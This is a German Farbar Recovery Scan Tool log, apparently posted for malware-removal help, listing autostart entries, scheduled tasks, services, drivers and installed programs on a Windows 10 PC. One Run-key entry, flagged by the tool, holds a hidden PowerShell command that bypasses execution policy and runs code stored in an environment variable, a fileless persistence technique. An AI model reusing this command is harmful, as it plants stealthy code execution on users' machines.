(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [302904 2019-07-19] (Apple Inc. -> Apple Inc.)
HKLM\...\Run: [EPPCCMON] => C:\Program Files (x86)\EPSON Software\Epson Printer Connection Checker\EPPCCMON.EXE [442936 2020-10-22] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
HKLM-x32\...\Run: [TrayServer] => C:\Program Files (x86)\MAGIX\Video_deluxe_MX_Plus\TrayServer_de.exe [90112 2008-08-07] (MAGIX AG) [Datei ist nicht signiert]
HKLM-x32\...\Run: [InCD] => C:\Program Files (x86)\Ahead\InCD\InCD.exe
HKLM-x32\...\Run: [EEventManager] => C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe [1087184 2016-01-20] (SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION)
HKU\S-1-5-21-716491260-3257532223-3478221735-1001\...\Run: [QMxNetworkSync] => C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\QMxNetworkSync.exe [851704 2018-11-13] (MAGIX Software GmbH -> MAGIX)
HKU\S-1-5-21-716491260-3257532223-3478221735-1001\...\Run: [EPLTarget\P0000000000000000] => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YATIRGE.EXE [417776 2014-11-14] (SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION)
HKU\S-1-5-21-716491260-3257532223-3478221735-1001\...\Run: [NBJ] => "C:\Program Files (x86)\Ahead\Nero BackItUp\NBJ.exe"
HKU\S-1-5-21-716491260-3257532223-3478221735-1001\...\Run: [EPSDNMON] => C:\Program Files (x86)\Epson Software\Download Navigator\EPSDNMON.EXE [346712 2020-07-27] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
HKU\S-1-5-21-716491260-3257532223-3478221735-1001\...\Run: [acbdabdacadcfecb] => powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -Command "IEX([Environment]::GetEnvironmentVariable('acbdabdacadcfecb', 'User'))" <==== ACHTUNG
HKLM\...\Print\Monitors\EPSON XP-900 Series 64MonitorBE: C:\WINDOWS\system32\E_YLMBRGE.DLL [182784 2015-12-09] (Microsoft Windows Hardware Compatibility Publisher -> SEIKO EPSON CORPORATION)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) ============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {089E1D84-AEE0-488C-88A7-D6CE087096DD} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe [693216 2021-01-06] (Mozilla Corporation -> Mozilla Foundation)
Task: {1AC2B76D-154F-426F-BB05-D603135A0EBE} - System32\Tasks\NvTmRepCR2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [950480 2018-11-13] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {202BF09C-1BD8-4167-8066-25DA191AA479} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [950480 2018-11-13] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {2E8498E4-689C-4F83-B839-9833BFFAE19E} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [696016 2018-11-13] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {719C960A-5108-4058-AF9F-1A0C8C497CCA} - \Microsoft\Windows\UNP\RunCampaignManager -> Keine Datei <==== ACHTUNG
Task: {72ABF53D-DE0C-4F2B-8B8F-1B16D29DCEDB} - System32\Tasks\NvTmRepCR3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [950480 2018-11-13] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {7CC7F993-3346-4FD8-A972-13FACE1F2619} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [855760 2018-11-13] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {814181A9-9584-41EF-8CA3-2AF505F4759C} - System32\Tasks\G2MUploadTask-S-1-5-21-716491260-3257532223-3478221735-1001 => C:\Users\Peter\AppData\Local\GoToMeeting\19228\g2mupload.exe [31320 2020-12-20] (LogMeIn, Inc. -> LogMeIn, Inc.)
Task: {946656EB-B6E2-4550-8811-989045BA23B8} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [570240 2017-02-14] (Apple Inc. -> Apple Inc.)
Task: {9A85E7E9-04B7-460B-B949-081BBF76EF44} - System32\Tasks\EPSON XP-900 Series Update {F9A32729-647E-4849-9E12-C9EB3BAD9726} => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSRGE.EXE [690536 2013-11-22] (SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION)
Task: {CB69C3AD-49EC-42FF-9D2B-90B0C3AF74F1} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [855760 2018-11-13] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {E84AA775-BBCA-46C9-A901-286E75FF8DA3} - System32\Tasks\NvTmRepCR1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [950480 2018-11-13] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {F1F10BFF-3BC5-45A5-945E-7A0157B66721} - \Scheduled Update for Ask Toolbar -> Keine Datei <==== ACHTUNG
Task: {F4362CDF-E227-43AB-9675-F299571D3DB3} - System32\Tasks\G2MUpdateTask-S-1-5-21-716491260-3257532223-3478221735-1001 => C:\Users\Peter\AppData\Local\GoToMeeting\19228\g2mupdate.exe [31320 2020-12-20] (LogMeIn, Inc. -> LogMeIn, Inc.)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\WINDOWS\Tasks\EPSON XP-900 Series Update {F9A32729-647E-4849-9E12-C9EB3BAD9726}.job => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSRGE.EXE:/EXE:{F9A32729-647E-4849-9E12-C9EB3BAD9726} /F:UpdateWORKGROUP\ESPRIMO$ĊSearches for EPSON software updates, and notifies you when updates are available.If this task is disabled or stopped, your EPSON software will not be automatically kept up to date.Thi
Task: C:\WINDOWS\Tasks\G2MUpdateTask-S-1-5-21-716491260-3257532223-3478221735-1001.job => C:\Users\Peter\AppData\Local\GoToMeeting\19228\g2mupdate.exe
Task: C:\WINDOWS\Tasks\G2MUploadTask-S-1-5-21-716491260-3257532223-3478221735-1001.job => C:\Users\Peter\AppData\Local\GoToMeeting\19228\g2mupload.exe

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 80.69.96.12 81.210.129.4
Tcpip\..\Interfaces\{b0472145-145f-4c3d-98b1-09bcd94a9b64}: [DhcpNameServer] 80.69.96.12 81.210.129.4

Edge: 
======
Edge Profile: C:\Users\Peter\AppData\Local\Microsoft\Edge\User Data\Default [2021-01-08]

FireFox:
========
FF DefaultProfile: q8p7ea2o.default
FF ProfilePath: C:\Users\Peter\AppData\Roaming\Mozilla\Firefox\Profiles\q8p7ea2o.default [2021-01-13]
FF Homepage: Mozilla\Firefox\Profiles\q8p7ea2o.default -> hxxps:\\\\www.ecosia.org/
FF Notifications: Mozilla\Firefox\Profiles\q8p7ea2o.default -> hxxps://www.epson.de
FF NewTabOverride: Mozilla\Firefox\Profiles\q8p7ea2o.default -> Disabled: web@Converter
FF Extension: (Ecosia – Die Suchmaschine, die Bäume pflanzt) - C:\Users\Peter\AppData\Roaming\Mozilla\Firefox\Profiles\q8p7ea2o.default\Extensions\{d04b0b40-3dab-4f0b-97a6-04ec3eddbfb0}.xpi [2019-01-02]

==================== Dienste (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [96056 2019-04-29] (Apple Inc. -> Apple Inc.)
S3 ElfoService; C:\Program Files (x86)\ElsterFormular Update Service\bin\elfoService.exe [1284360 2018-03-31] (Bayerisches Landesamt fuer Steuern -> )
R2 EpsonScanSvc; C:\WINDOWS\system32\EscSvc64.exe [145224 2016-11-08] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
R2 Fabs; C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\FABS.exe [1858048 2012-01-23] (MAGIX AG) [Datei ist nicht signiert]
S3 FirebirdServerMAGIXInstance; C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\fbserver.exe [2702848 2011-04-26] (MAGIX®) [Datei ist nicht signiert]
R2 MyEpson Portal Service; C:\Program Files (x86)\EPSON\MyEpson Portal\mepService.exe [714712 2017-06-28] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
S2 PCLEPCI; C:\Windows\SysWOW64\drivers\pclepci.sys [14165 2005-02-09] (Pinnacle Systems GmbH) [Datei ist nicht signiert]
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [5197552 2020-12-11] (Microsoft Windows Publisher -> Microsoft Corporation)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [3004048 2019-12-07] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103384 2019-12-07] (Microsoft Windows Publisher -> Microsoft Corporation)
S2 InCDsrv; C:\Program Files (x86)\Ahead\InCD\InCDsrv.exe [X]
S2 InCDsrvR; C:\Program Files (x86)\Ahead\InCD\InCDsrv.exe -r [X]
S2 McAfee WebAdvisor; "C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe" [X]

===================== Treiber (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

S3 61883; C:\WINDOWS\System32\drivers\61883.sys [70144 2019-12-07] (Microsoft Windows -> Microsoft Corporation)
S0 amdkmafd; C:\WINDOWS\System32\drivers\amdkmafd.sys [49448 2016-08-18] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
S3 BthA2dp; C:\WINDOWS\System32\drivers\BthA2dp.sys [279040 2019-12-07] (Microsoft Corporation) [Datei ist nicht signiert]
S3 FscEfDmi; C:\WINDOWS\System32\drivers\FscEfDmi.sys [25856 2014-04-16] (Fujitsu Technology Solutions GmbH -> Fujitsu Technology Solutions)
S3 FscGabi; C:\WINDOWS\System32\drivers\FscGabi.sys [29952 2014-04-16] (Fujitsu Technology Solutions GmbH -> Fujitsu Technology Solutions)
S3 hitmanpro37; C:\WINDOWS\system32\drivers\hitmanpro37.sys [55232 2021-01-04] (SurfRight B.V. -> )
S0 WdBoot; C:\WINDOWS\System32\drivers\WdBoot.sys [46688 2019-12-07] (Microsoft Windows Early Launch Anti-Malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\WdFilter.sys [350136 2019-12-07] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [54200 2019-12-07] (Microsoft Windows -> Microsoft Corporation)

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat (erstellte) (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2021-01-14 00:15 - 2021-01-14 00:16 - 000014019 ____C C:\Users\Peter\Desktop\FRST.txt
2021-01-13 23:23 - 2021-01-13 23:14 - 008458096 ____C (Malwarebytes) C:\Users\Peter\Desktop\adwcleaner_8.0.9.exe
2021-01-13 23:15 - 2021-01-13 23:18 - 000000000 ___DC C:\AdwCleaner
2021-01-13 20:41 - 2021-01-14 00:16 - 000000000 ___DC C:\FRST
2021-01-13 20:33 - 2021-01-13 21:59 - 002281472 ____C (Farbar) C:\Users\Peter\Desktop\FRST64.exe
2021-01-07 11:18 - 2020-10-05 14:05 - 001769688 _____ C:\WINDOWS\system32\vulkaninfo-1-999-0-0-0.exe
2021-01-07 11:18 - 2020-10-05 14:05 - 001769688 _____ C:\WINDOWS\system32\vulkaninfo.exe
2021-01-07 11:18 - 2020-10-05 14:05 - 001370328 _____ C:\WINDOWS\SysWOW64\vulkaninfo-1-999-0-0-0.exe
2021-01-07 11:18 - 2020-10-05 14:05 - 001370328 _____ C:\WINDOWS\SysWOW64\vulkaninfo.exe
2021-01-07 11:18 - 2020-10-05 14:05 - 001054944 _____ C:\WINDOWS\system32\vulkan-1-999-0-0-0.dll
2021-01-07 11:18 - 2020-10-05 14:05 - 001054944 _____ C:\WINDOWS\system32\vulkan-1.dll
2021-01-07 11:18 - 2020-10-05 14:05 - 000917728 _____ C:\WINDOWS\SysWOW64\vulkan-1-999-0-0-0.dll
2021-01-07 11:18 - 2020-10-05 14:05 - 000917728 _____ C:\WINDOWS\SysWOW64\vulkan-1.dll
2021-01-07 11:18 - 2020-10-05 14:05 - 000455408 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.dll
2021-01-07 11:18 - 2020-10-05 14:05 - 000351128 _____ (Khronos Group) C:\WINDOWS\SysWOW64\OpenCL.dll
2021-01-07 11:18 - 2020-10-05 14:03 - 001507224 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFR64.dll
2021-01-07 11:18 - 2020-10-05 14:03 - 001161112 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFR.dll
2021-01-07 11:18 - 2020-10-05 14:03 - 000816368 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvmcumd.dll
2021-01-07 11:18 - 2020-10-05 14:03 - 000673520 _____ C:\WINDOWS\system32\nvofapi64.dll
2021-01-07 11:18 - 2020-10-05 14:03 - 000670616 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFROpenGL.dll
2021-01-07 11:18 - 2020-10-05 14:03 - 000555248 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFROpenGL.dll
2021-01-07 11:18 - 2020-10-05 14:03 - 000543128 _____ C:\WINDOWS\SysWOW64\nvofapi.dll
2021-01-07 11:18 - 2020-10-05 14:03 - 000047424 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvhdap64.dll
2021-01-07 11:18 - 2020-10-05 14:02 - 007707544 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuvid.dll
2021-01-07 11:18 - 2020-10-05 14:02 - 006860184 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuvid.dll
2021-01-07 11:18 - 2020-10-05 14:02 - 004174064 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuda.dll
2021-01-07 11:18 - 2020-10-05 14:02 - 002508528 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuda.dll
2021-01-07 11:18 - 2020-10-05 14:02 - 002098072 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvFBC64.dll
2021-01-07 11:18 - 2020-10-05 14:02 - 001731824 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispco6445671.dll
2021-01-07 11:18 - 2020-10-05 14:02 - 001585560 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvFBC.dll
2021-01-07 11:18 - 2020-10-05 14:02 - 001482992 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispgenco6445671.dll
2021-01-07 11:18 - 2020-10-05 14:00 - 005972824 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvapi.dll
2021-01-06 17:39 - 2021-01-06 17:39 - 000000000 ____D C:\WINDOWS\system32\Tasks\Mozilla
2021-01-06 16:48 - 2021-01-08 08:54 - 000000000 ____D C:\Program Files\Mozilla Firefox
2021-01-04 15:59 - 2021-01-04 15:59 - 000055232 _____ C:\WINDOWS\system32\Drivers\hitmanpro37.sys
2021-01-04 15:57 - 2021-01-04 15:57 - 000016810 _____ C:\WINDOWS\system32\.crusader
2021-01-04 15:44 - 2021-01-12 15:22 - 000000000 ____D C:\WINDOWS\CryptoGuard
2021-01-04 15:44 - 2021-01-12 15:20 - 000000000 ____D C:\ProgramData\HitmanPro.Alert
2021-01-04 15:41 - 2021-01-12 15:23 - 000000000 ____D C:\ProgramData\Sophos
2021-01-04 15:40 - 2021-01-04 15:40 - 307274360 _____ (Sophos Limited) C:\Users\Peter\Downloads\SophosInstall.exe
2020-12-17 10:06 - 2020-12-17 10:43 - 000000000 ____D C:\Program Files (x86)\Mozilla Thunderbird

==================== Ein Monat (geänderte) ==================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2021-01-14 00:12 - 2020-08-02 10:34 - 001722788 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2021-01-14 00:12 - 2019-12-07 15:51 - 000743650 _____ C:\WINDOWS\system32\perfh007.dat
2021-01-14 00:12 - 2019-12-07 15:51 - 000150072 _____ C:\WINDOWS\system32\perfc007.dat
2021-01-14 00:12 - 2019-12-07 10:13 - 000000000 ____D C:\WINDOWS\INF
2021-01-14 00:07 - 2020-08-02 10:34 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2021-01-14 00:07 - 2020-08-02 10:26 - 000008192 ___SH C:\DumpStack.log.tmp
2021-01-14 00:07 - 2019-12-07 10:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2021-01-14 00:07 - 2019-12-07 10:03 - 000524288 _____ C:\WINDOWS\system32\config\BBI
2021-01-14 00:07 - 2018-11-24 12:22 - 000000000 ____D C:\ProgramData\NVIDIA
2021-01-14 00:06 - 2017-04-02 14:30 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MAGIX
2021-01-14 00:06 - 2017-04-02 14:30 - 000000000 ____D C:\Program Files (x86)\MAGIX
2021-01-13 23:54 - 2017-04-02 11:56 - 000000000 ___DC C:\Users\Peter\AppData\LocalLow\Mozilla
2021-01-13 23:30 - 2020-08-02 10:28 - 000888552 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2021-01-13 23:04 - 2020-08-02 10:28 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2021-01-13 22:53 - 2019-12-07 10:03 - 000000000 ____D C:\WINDOWS\CbsTemp
2021-01-13 22:18 - 2017-04-02 14:16 - 000000000 ____D C:\ProgramData\McAfee
2021-01-13 22:11 - 2019-12-07 10:14 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2021-01-13 22:11 - 2019-12-07 10:03 - 000032768 _____ C:\WINDOWS\system32\config\ELAM
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___HD C:\Program Files\WindowsApps
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2021-01-13 22:05 - 2018-03-19 14:48 - 000000000 ___DC C:\Users\Peter\AppData\Local\Packages
2021-01-13 22:04 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Macromed
2021-01-13 22:04 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Macromed
2021-01-13 22:03 - 2017-12-01 10:41 - 000000000 ___DC C:\Users\Peter\AppData\Local\QMxNetworkSync
2021-01-12 14:54 - 2020-08-02 10:28 - 000000000 ____D C:\Users\Peter
2021-01-09 09:16 - 2020-08-04 15:39 - 000002443 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2021-01-09 09:16 - 2020-08-04 15:39 - 000002281 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk
2021-01-09 09:16 - 2020-08-04 15:39 - 000002281 _____ C:\ProgramData\Desktop\Microsoft Edge.lnk
2021-01-08 08:56 - 2020-12-11 10:37 - 000094208 _____ C:\Users\Peter\AppData\Roaming\cookies.sqlite
2021-01-08 08:54 - 2017-03-31 21:22 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2021-01-07 11:20 - 2018-11-24 12:21 - 000000000 ____D C:\ProgramData\NVIDIA Corporation
2021-01-07 11:19 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\Help
2021-01-07 11:19 - 2018-11-24 12:21 - 000000000 ____D C:\Program Files\NVIDIA Corporation
2021-01-06 17:39 - 2017-04-02 11:42 - 000001012 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2021-01-04 10:41 - 2019-12-07 15:52 - 000000000 ____D C:\WINDOWS\system32\FxsTmp
2021-01-04 10:41 - 2017-12-01 10:37 - 000000000 ____D C:\ProgramData\tmp
2020-12-30 10:35 - 2018-05-17 11:33 - 000000000 ___DC C:\Users\Peter\AppData\Local\PlaceholderTileLogoFolder
2020-12-26 15:54 - 2017-09-03 11:42 - 000011483 ____C C:\Users\Peter\Documents\Etiketten 2.odt
2020-12-22 10:53 - 2020-03-04 19:02 - 000000650 _____ C:\WINDOWS\Tasks\G2MUploadTask-S-1-5-21-716491260-3257532223-3478221735-1001.job
2020-12-22 10:53 - 2020-03-04 19:02 - 000000554 _____ C:\WINDOWS\Tasks\G2MUpdateTask-S-1-5-21-716491260-3257532223-3478221735-1001.job
2020-12-20 17:40 - 2020-08-02 10:34 - 000003802 _____ C:\WINDOWS\system32\Tasks\G2MUploadTask-S-1-5-21-716491260-3257532223-3478221735-1001
2020-12-20 17:40 - 2020-08-02 10:34 - 000003706 _____ C:\WINDOWS\system32\Tasks\G2MUpdateTask-S-1-5-21-716491260-3257532223-3478221735-1001
2020-12-20 17:40 - 2020-03-04 19:02 - 000000000 ____D C:\Users\Peter\AppData\Local\GoToMeeting
2020-12-17 10:43 - 2017-03-31 21:22 - 000001285 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Thunderbird.lnk

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse ========

2020-12-11 10:37 - 2021-01-08 08:56 - 000094208 _____ () C:\Users\Peter\AppData\Roaming\cookies.sqlite
2018-07-18 11:17 - 2018-07-18 11:17 - 000006144 ____C () C:\Users\Peter\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2017-05-15 18:39 - 2017-05-15 18:39 - 000007619 ____C () C:\Users\Peter\AppData\Local\Resmon.ResmonCfg

==================== SigCheck ============================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

==================== Ende von FRST.txt ========================
         
Addition.txt
Code:
ATTFilter
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 09-01-2021
durchgeführt von Peter (14-01-2021 00:17:09)
Gestartet von C:\Users\Peter\Desktop
Windows 10 Pro Version 2004 19041.685 (X64) (2020-08-02 09:35:06)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-716491260-3257532223-3478221735-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-716491260-3257532223-3478221735-503 - Limited - Disabled)
defaultuser0 (S-1-5-21-716491260-3257532223-3478221735-1000 - Limited - Disabled) => C:\Users\defaultuser0
Gast (S-1-5-21-716491260-3257532223-3478221735-501 - Limited - Disabled)
Peter (S-1-5-21-716491260-3257532223-3478221735-1001 - Administrator - Enabled) => C:\Users\Peter
WDAGUtilityAccount (S-1-5-21-716491260-3257532223-3478221735-504 - Limited - Disabled)

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: McAfee VirusScan (Enabled - Up to date) {4DE344F8-6897-65B4-CED0-82B3AF2591B4}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

AeroFly Professional Deluxe (inkl. Add-On 1) (HKLM-x32\...\{8B3E5A90-1F6E-4FAF-B84F-C306C8A80809}) (Version: 1.9.0103 - IPACS)
AeroFly Professional Deluxe AddOn 3 (True Scale AddOn) (HKLM-x32\...\{4F5EBA69-57B4-484D-B60D-DD95981031A0}) (Version: 1.11.0705 - IPACS)
AeroFly Professional Deluxe AddOn 4 (Team Edition 1) (HKLM-x32\...\{780FAA54-2FA0-4CF4-A9C8-AE50C8B469C9}) (Version: 1.11.0707 - IPACS)
Apple Application Support (32-Bit) (HKLM-x32\...\{5C028510-A6A1-409A-A2BF-4DCB43B21EF9}) (Version: 7.6 - Apple Inc.)
Apple Application Support (64-Bit) (HKLM\...\{5C7D4FCF-80C5-4520-9934-D50532AAC59C}) (Version: 7.6 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{B5A46811-3612-4DA5-8A5A-E6DED5D7C523}) (Version: 12.2.1.12 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{52D87F32-70E4-4348-8148-C0B9F35B1314}) (Version: 2.3.0.177 - Apple Inc.)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
Catalyst Control Center Next Localization BR (HKLM\...\{3E245378-BF77-6946-C6F6-096DBE5EAB82}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (HKLM\...\{45907537-804A-514F-5280-5F4F12A6DCBC}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (HKLM\...\{962364E4-08BB-347D-32E7-2B789F37BF8A}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (HKLM\...\{A0407E39-2AA4-60B3-885F-3C5347B6909E}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (HKLM\...\{0989D0EA-AFF3-5F9A-3D25-20EE133E409B}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (HKLM\...\{A8689A0F-5928-7300-B82B-C5E85131B7BA}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (HKLM\...\{76AAF56B-93D8-161D-809A-EC05F3B913DA}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (HKLM\...\{063CED74-F5F0-870E-DC9C-2D78FDEDA3EE}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (HKLM\...\{13BB60AA-88F7-4B1F-2DEC-D81EEDE8B3AA}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (HKLM\...\{37AA6227-FF2C-95AC-87C0-45DCC0BB87DA}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (HKLM\...\{EB328356-1DF0-1CCE-3607-6361DD329219}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (HKLM\...\{87E6EC29-AEC5-28CB-F773-93EB6C1B8A2B}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (HKLM\...\{CA55697D-BD74-3ED8-6B21-D7EDAD3B7D02}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (HKLM\...\{CFC860C8-4F51-E08C-A74C-2E444ED06160}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (HKLM\...\{9338D693-38B7-1ED4-9B42-BFA1D5600CCB}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (HKLM\...\{C971C145-258D-6650-7088-13DDB161327A}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (HKLM\...\{EBA09DAF-14B4-7BE7-676E-6E2FB21EDBDD}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (HKLM\...\{9AA4DD93-94BF-22EA-C9D2-7084F304A31B}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
